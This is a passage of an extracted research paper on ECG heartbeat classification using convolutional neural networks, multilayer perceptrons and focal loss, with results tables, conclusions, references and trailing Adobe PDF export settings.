all correct classifications. Since the heartbeat classes are imbalanced, f1-score (F1) is also selected as the performance measure, defined as: F1i ¼ 2 � PPVi � SEi PPVi þ SEi f1-score takes both the positive predictive value PPVi and sensitivity SEi into account, and is generally useful than ACCi in the imbalance class distribution (Chen, 2009). Comparison with existing works Based on De Chazal, O’Dwyer & Reilly (2004), the dataset is divided into DS1 and DS2 datasets. DS1 is used for training and DS2 is used to test our proposed method. For fair evaluation, we compare works (Chen et al., 2017; De Chazal, O’Dwyer & Reilly, 2004; Garcia et al., 2017; Liu et al., 2019; Mar et al., 2011; Zhang et al., 2014) that adopt the same strategy. As SVEB and VEB are more important than other classes, we list the detailed information of these two classes in Table 4. The experimental results show that the proposed method has better recognition in the inter-patient paradigm, with F1s of SVEB and VEB of 74.29% and 92.40%, respectively. In particular, the PPV of SVEB is 68.34%, indicating that the proposed method has better SVEB recognition ability. The 93.72% SE of VEB is superior to most reported works. The evaluation results of all four-classes are listed in Table 5. The results related to PPV and SE are close to or surpass those obtained with existing works except for F. For category F, it is mainly composed of the fusion of ventricular beat and normal beat, which is very close to the normal heartbeat. Meanwhile, compared with other categories, F has the least number and the most serious imbalance. As a result, the performance of existing works is unstable in this category, usually a large number of N is predicted as F or F is predicted as N. In the article, although the focus loss is introduced, due to the high imbalance of F, the proposed method cannot extract the discriminate features. Mar et al. (2011) although, obtains the best PPV in F, a large number of N is incorrectly classified as F. We suggest that category F can be included in other categories in future research. Table 4 Performance comparison of our proposed method with existing works in SVEB and VEB classes. Methods SVEB VEB PPV (%) SE (%) F1 (%) Accuracy (%) PPV (%) SE (%) F1 (%) Accuracy (%) De Chazal, O’Dwyer & Reilly (2004) 38.53 75.98 51.13 94.61 81.67 80.31 80.98 97.62 Chen et al. (2017) 38.40 29.50 33.36 95.34 85.25 70.85 77.38 97.32 Zhang et al. (2014) 35.98 79.06 49.46 93.33 92.75 85.48 88.96 98.63 Mar et al. (2011) 33.53 83.22 47.80 93.28 75.89 86.75 80.96 97.35 Liu et al. (2019) 39.87 33.12 36.18 95.49 76.51 90.20 82.79 97.45 Garcia et al. (2017) 53.00 62.00 57.15 – 59.40 87.30 70.70 – Our proposed method 68.34 81.37 74.29 97.92 91.12 93.72 92.40 99.00 Wang et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.324 12/17 http://dx.doi.org/10.7717/peerj-cs.324 https://peerj.com/computer-science/ DISCUSSION Focal loss vs. Cross-entropy loss Since the heartbeat has an imbalanced class distribution, the cross-entropy loss is replaced by the focal loss as the loss function of the model in the article. The performance comparison of the two losses is listed in Table 6. Both losses have similar overall accuracy, but compared to cross-entropy loss, the overall PPV, SE and F1 of the focal loss are significantly improved. An overall PPV of 64.68%, SE of 68.55%, and F1 of 66.09% are achieved by the focal loss, while the cross-entropy loss obtains an overall PPV of 59.82%, SE of 66.77%, and F1 of 62.67%. The corresponding metrics increased by 4.86%, 1.78%, and 3.42%, respectively. In addition, for each specific class, the PPV, SE, and F1 of the focal loss also have achieved comparable or better performance than the cross-entropy loss, especially in the F1. The confusion matrix of the two losses is listed in Table 7. The focal loss achieves a total of 45,952 correct predictions, while the cross-entropy obtains 45,358 correct Table 5 Performance comparison of our proposed method with existing works in all four classes. Methods Accuracya Macro-F1b N SVEB VEB F PPV (%) SE (%) PPV (%) SE (%) PPV (%) SE (%) PPV (%) SE (%) De Chazal, O’Dwyer & Reilly (2004) 86.24 60.12 99.17 87.06 38.53 75.98 81.67 80.31 8.57 89.43 Chen et al. (2017) 93.14 51.91 95.42 98.42 38.40 29.50 85.25 70.85 0.00 0.00 Zhang et al. (2014) 88.34 64.02 98.98 88.94 35.98 79.06 92.75 85.48 13.73 93.81 Mar et al. (2011) 88.99 62.24 99.12 89.64 33.53 83.22 75.89 86.75 16.57 61.08 Liu et al. (2019) – 58.50 96.66 94.06 39.87 33.12 76.51 90.20 12.99 40.72 Garcia et al. (2017) 92.40 55.95 98.00 94.00 53.00 62.00 59.40 87.30 – – Our proposed method 92.53 66.09 98.20 93.67 68.34 81.37 91.12 93.72 1.06 5.41 Notes: a Accuracy = (TPN + TPSVEB + TPVEB + TPF)/number of testing heartbeats. b Average f1-score of four AAMI classes. Table 6 Performance comparison of focal loss and cross-entropy loss. Methods AAMI class Performance metrics PPV (%) SE (%) F1 (%) Accuracy (%) Focal Loss N 98.20 93.67 95.88 92.84 SVEB 68.34 81.37 74.29 97.92 VEB 91.12 93.72 92.40 99.00 F 1.06 5.41 1.77 95.31 Averagea 64.68 68.55 66.09 96.27 Cross-Entropy Loss N 98.11 92.42 95.18 91.67 SVEB 57.11 80.72 66.89 97.05 VEB 83.95 93.45 88.44 98.42 F 0.11 0.52 0.18 95.54 Averagea 59.82 66.77 62.67 95.67 Note: a Refers to the average value of the corresponding metrics of four AAMI classes. Wang et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.324 13/17 http://dx.doi.org/10.7717/peerj-cs.324 https://peerj.com/computer-science/ predictions. With the focal loss, the total correct prediction has slightly increased, perhaps due to the suppression of easy-to-classify samples by focal loss. CONCLUSIONS A hybrid method for heartbeat classification via CNN, MLP and focal loss is developed in the article. Among them, CNN is used to extract the morphological features of the heartbeat. Then the morphological features are combined with the RR intervals features and input into the MLP to perform heartbeat classification. Furthermore, in order to avoid the impact of heartbeat imbalance, a focal loss function is introduced. Tested by using the MIT-BIH arrhythmia database, the experimental results confirm that the method has good overall performance, with F1 of 66.09% and accuracy of 96.27%. The superiority of the proposed method is due to multifactorial: (I) Compared with traditional hand-craft features, CNN as an automatic extraction method can adapt to small mutations in ECG signals to obtain powerful features; (II) Besides the CNN-based morphological features, the pre-extracted RR interval features are also combined to build the model, avoiding the loss of dynamic information due to heartbeat segmentation; (III) A focal loss function is introduced to solve the class imbalance, preventing the model from biasing towards the majority class; (IV) One-step training can improve the model to obtain better feature abstraction capabilities. Due to the simple yet effective of the proposed inter-patient method, it has the potential to be used for personal automatic heartbeat classification for surveillance in telemedicine. The encouraging results have inspired continuous exploration. The future work will include (I) testing the performance of the developed model with more ECG signals; (II) designing or modifying CNN architecture to further improve the performance of our method; (III) trying to use additional techniques such as wavelet transform to convert time-domain information to frequency-domain information to reduce the difficulty of CNN feature extraction. ADDITIONAL INFORMATION AND DECLARATIONS Funding The work is supported by the Science and Technology Service Network Initiative of the Chinese Academy of Sciences (Grant No. KFJ-STS-ZDTP-079). The funders had no role in Table 7 Confusion matrix of focal loss and cross-entropy loss. Focal loss Predicted class Total Cross-entropy loss Predicted class Total N SVEB VEB F N SVEB VEB F Ground Truth N 41,420 671 206 1,921 44,218 N 40,866 1,082 462 1,808 44,218 SVEB 282 1,494 57 3 1,836 SVEB 246 1,482 95 13 1,836 VEB 141 21 3,017 40 3,219 VEB 173 31 3,008 7 3,219 F 336 0 31 21 388 F 368 0 18 2 388 Total 42,179 2,186 3,311 1,985 49,661 Total 41,653 2,595 3583 1,830 49,661 Wang et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.324 14/17 http://dx.doi.org/10.7717/peerj-cs.324 https://peerj.com/computer-science/ study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Science and Technology Service Network Initiative of the Chinese Academy of Sciences: KFJ-STS-ZDTP-079. Competing Interests Mei Yang is employed by Beijing Huaru Technology Co., Ltd. Author Contributions � Tao Wang conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Changhua Lu conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. � Mei Yang conceived and designed the experiments, performed the experiments, authored or reviewed drafts of the paper, and approved the final draft. � Feng Hong conceived and designed the experiments, analyzed the data, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. � Chun Liu conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: This work uses a public dataset from: Goldberger, A., Amaral, L., Glass, L., Hausdorff, J., Ivanov, P.C., Mark, R., Mietus, J.E., Moody, G.B., Peng, C.K. and Stanley, H.E., 2000. PhysioBank, PhysioToolkit, and PhysioNet: Components of a new research resource for complex physiologic signals. Circulation [Online]. 101 (23), pp. e215–e220. https://www.physionet.org/content/mitdb/ 1.0.0/. Code is available at GitHub: https://github.com/JackAndCole/Deep-Neural-Network- For-Heartbeat-Classification. REFERENCES Chen S, Hua W, Li Z, Li J, Gao X. 2017. Heartbeat classification using projected and dynamic features of ECG signal. Biomedical Signal Processing and Control 31:165–173. Chen Y. 2009. Learning classifiers from imbalanced, only positive and unlabeled data sets. Department of Computer Science, Iowa State University. Available at http://web.cs.iastate.edu/ ~yetianc/cs573/files/CS573_ProjectReport_YetianChen.pdf (accessed 15 January 2016). Wang et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.324 15/17 https://www.physionet.org/content/mitdb/1.0.0/ https://www.physionet.org/content/mitdb/1.0.0/ https://github.com/JackAndCole/Deep-Neural-Network-For-Heartbeat-Classification https://github.com/JackAndCole/Deep-Neural-Network-For-Heartbeat-Classification http://web.cs.iastate.edu/~yetianc/cs573/files/CS573_ProjectReport_YetianChen.pdf http://web.cs.iastate.edu/~yetianc/cs573/files/CS573_ProjectReport_YetianChen.pdf http://dx.doi.org/10.7717/peerj-cs.324 https://peerj.com/computer-science/ Chu J, Wang H, Lu W. 2019a. A novel two-lead arrhythmia classification system based on CNN and LSTM. Journal of Mechanics in Medicine and Biology 19(3):1950004 DOI 10.1142/S0219519419500040. Chu Y, Shen H, Huang K. 2019b. ECG authentication method based on parallel multi-scale one- dimensional residual network with center and margin loss. IEEE Access 7:51598–51607 DOI 10.1109/ACCESS.2019.2912519. De Albuquerque VHC, Nunes TM, Pereira DR, Luz EJDS, Menotti D, Papa JP, Tavares JMRS. 2018. Robust automated cardiac arrhythmia detection in ECG beat signals. Neural Computing and Applications 29:679–693. De Chazal P, O’Dwyer M, Reilly RB. 2004. Automatic classification of heartbeats using ECG morphology and heartbeat interval features. IEEE Transactions on Biomedical Engineering 51(7):1196–1206 DOI 10.1109/TBME.2004.827359. Gacek A, Pedrycz W. 2012. ECG signal processing, classification and interpretation. London: Springer, 278. Garcia G, Moreira G, Menotti D, Luz E. 2017. Inter-patient ECG heartbeat classification with temporal VCG optimized by PSO. Scientific Reports 7(1):10543 DOI 10.1038/s41598-017-09837-3. Hannun AY, Rajpurkar P, Haghpanahi M, Tison GH, Bourn C, Turakhia MP, Ng AY. 2019. Cardiologist-level arrhythmia detection and classification in ambulatory electrocardiograms using a deep neural network. Nature Medicine 25(1):65–69 DOI 10.1038/s41591-018-0268-3. Howland DS, Liu J, She Y, Goad B, Maragakis NJ, Kim B, Erickson J, Kulik J, DeVito L, Psaltis G, DeGennaro LJ, Cleveland DW, Rothstein JD. 2002. Focal loss of the glutamate transporter EAAT2 in a transgenic rat model of SOD1 mutant-mediated amyotrophic lateral sclerosis (ALS). Proceedings of the National Academy of Sciences 99:1604–1609 DOI 10.1073/pnas.032539299. Huang J, Liu H, Dai J, Cai W. 2018. Reconstruction for limited-data nonlinear tomographic absorption spectroscopy via deep learning. Journal of Quantitative Spectroscopy and Radiative Transfer 218:187–193 DOI 10.1016/j.jqsrt.2018.07.011. Lin T-Y, Goyal P, Girshick R, He K, Dollár P. 2017. Focal loss for dense object detection. In: Proceedings of the IEEE International Conference on Computer Vision. 2980–2988. Liu J, Song S, Sun G, Fu Y. 2019. Classification of ECG arrhythmia using CNN, SVM and LDA. Cham: Springer International Publishing, 191–201. Liu Y, Chen Y. 2017. Recognition of facial expression based on CNN-CBP features. In: 29th Chinese Control and Decision Conference (CCDC). Piscataway: IEEE, 2139–2145. Mar T, Zaunseder S, Martínez JP, Llamedo M, Poll R. 2011. Optimization of ECG classification by means of feature selection. IEEE Transactions on Biomedical Engineering 58(8):2168–2177 DOI 10.1109/TBME.2011.2113395. Mondéjar-Guerra V, Novo J, Rouco J, Penedo MG, Ortega M. 2019. Heartbeat classification fusing temporal and morphological information of ECGs via ensemble of classifiers. Biomedical Signal Processing and Control 47:41–48 DOI 10.1016/j.bspc.2018.08.007. Moody GB, Mark RG. 2001. The impact of the MIT-BIH arrhythmia database. IEEE Engineering in Medicine and Biology Magazine 20:45–50 DOI 10.1109/51.932724. Palaz D, Magimai-Doss M, Collobert R. 2015. Analysis of CNN-based speech recognition system using raw speech as input. In: Interspeech. Available at http://publications.idiap.ch/index.php/ publications/show/3174. Pan J, Tompkins WJ. 1985. A real-time QRS detection algorithm. IEEE Transactions on Biomedical Engineering 32(3):230–236 DOI 10.1109/TBME.1985.325532. Wang et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.324 16/17 http://dx.doi.org/10.1142/S0219519419500040 http://dx.doi.org/10.1109/ACCESS.2019.2912519 http://dx.doi.org/10.1109/TBME.2004.827359 http://dx.doi.org/10.1038/s41598-017-09837-3 http://dx.doi.org/10.1038/s41591-018-0268-3 http://dx.doi.org/10.1073/pnas.032539299 http://dx.doi.org/10.1016/j.jqsrt.2018.07.011 http://dx.doi.org/10.1109/TBME.2011.2113395 http://dx.doi.org/10.1016/j.bspc.2018.08.007 http://dx.doi.org/10.1109/51.932724 http://publications.idiap.ch/index.php/publications/show/3174 http://publications.idiap.ch/index.php/publications/show/3174 http://dx.doi.org/10.1109/TBME.1985.325532 http://dx.doi.org/10.7717/peerj-cs.324 https://peerj.com/computer-science/ Pourbabaee B, Roshtkhari MJ, Khorasani K. 2018. Deep convolutional neural networks and learning ECG features for screening paroxysmal atrial fibrillation patients. IEEE Transactions on Systems, Man, and Cybernetics: Systems 48(12):2095–2104 DOI 10.1109/TSMC.2017.2705582. Robinson S, Cattaneo A, El-Said M. 2001. Updating and estimating a social accounting matrix using cross entropy methods. Economic Systems Research 13:47–64 DOI 10.1080/09535310120026247. Romdhane TF, Alhichri H, Ouni R, Atri M. 2020. Electrocardiogram heartbeat classification based on a deep convolutional neural network and focal loss. Computers in Biology and Medicine 123:103866 DOI 10.1016/j.compbiomed.2020.103866. Ruangsuwana R, Velikic G, Bocko M. 2010. Methods to extract respiration information from ECG signals. In: 2010 IEEE International Conference on Acoustics, Speech and Signal Processing. Piscataway: IEEE, 570–573. Sannino G, De Pietro G. 2018. A deep learning approach for ECG-based heartbeat classification for arrhythmia detection. Future Generation Computer Systems 86:446–455 DOI 10.1016/j.future.2018.03.057. Sellami A, Hwang H. 2019. A robust deep convolutional neural network with batch-weighted loss for heartbeat classification. Expert Systems with Applications 122:75–84 DOI 10.1016/j.eswa.2018.12.037. Shen R, Yu Y, Lan R, Yu R, Yuan Z, Xia Z. 2019. The cardiovascular toxicity induced by high doses of gatifloxacin and ciprofloxacin in zebrafish. Environmental Pollution 254:112861 DOI 10.1016/j.envpol.2019.07.029. Vulaj Z, Draganić A, Brajović M, Orović I. 2017. A tool for ECG signal analysis using standard and optimized Hermite transform. In: 2017 6th Mediterranean Conference on Embedded Computing (MECO). Piscataway: IEEE, 1–4. Ye C, Kumar BV, Coimbra MT. 2012. Heartbeat classification using morphological and dynamic features of ECG signals. IEEE Transactions on Biomedical Engineering 59:2930–2941 DOI 10.1109/TBME.2012.2213253. Yıldırım Ö., Pławiak P, Tan R-S, Acharya UR. 2018. Arrhythmia detection using deep convolutional neural network with long duration ECG signals. Computers in Biology and Medicine 102:411–420 DOI 10.1016/j.compbiomed.2018.09.009. Yin W, Kann K, Yu M, Schütze H. 2017. Comparative study of cnn and rnn for natural language processing. Available at https://arxiv.org/abs/1702.01923. Zhang Q, Zhou D, Zeng X. 2017. HeartID: a multiresolution convolutional neural network for ECG-based biometric human identification in smart health applications. IEEE Access 5:11805–11816. Zhang Z, Dong J, Luo X, Choi K-S, Wu X. 2014. Heartbeat classification using disease-specific feature selection. Computers in Biology and Medicine 46:79–89 DOI 10.1016/j.compbiomed.2013.11.019. Zhou F-Q, Waterman-Storer CM, Cohan CS. 2002. Focal loss of actin bundles causes microtubule redistribution and growth cone turning. Journal of Cell Biology 157(5):839–849 DOI 10.1083/jcb.200112014. Wang et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.324 17/17 http://dx.doi.org/10.1109/TSMC.2017.2705582 http://dx.doi.org/10.1080/09535310120026247 http://dx.doi.org/10.1016/j.compbiomed.2020.103866 http://dx.doi.org/10.1016/j.future.2018.03.057 http://dx.doi.org/10.1016/j.eswa.2018.12.037 http://dx.doi.org/10.1016/j.envpol.2019.07.029 http://dx.doi.org/10.1109/TBME.2012.2213253 http://dx.doi.org/10.1016/j.compbiomed.2018.09.009 https://arxiv.org/abs/1702.01923 http://dx.doi.org/10.1016/j.compbiomed.2013.11.019 http://dx.doi.org/10.1083/jcb.200112014 http://dx.doi.org/10.7717/peerj-cs.324 https://peerj.com/computer-science/ A hybrid method for heartbeat classification via convolutional neural networks, multilayer perceptrons and focal loss Introduction Related works Methods Results Discussion Conclusions References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA 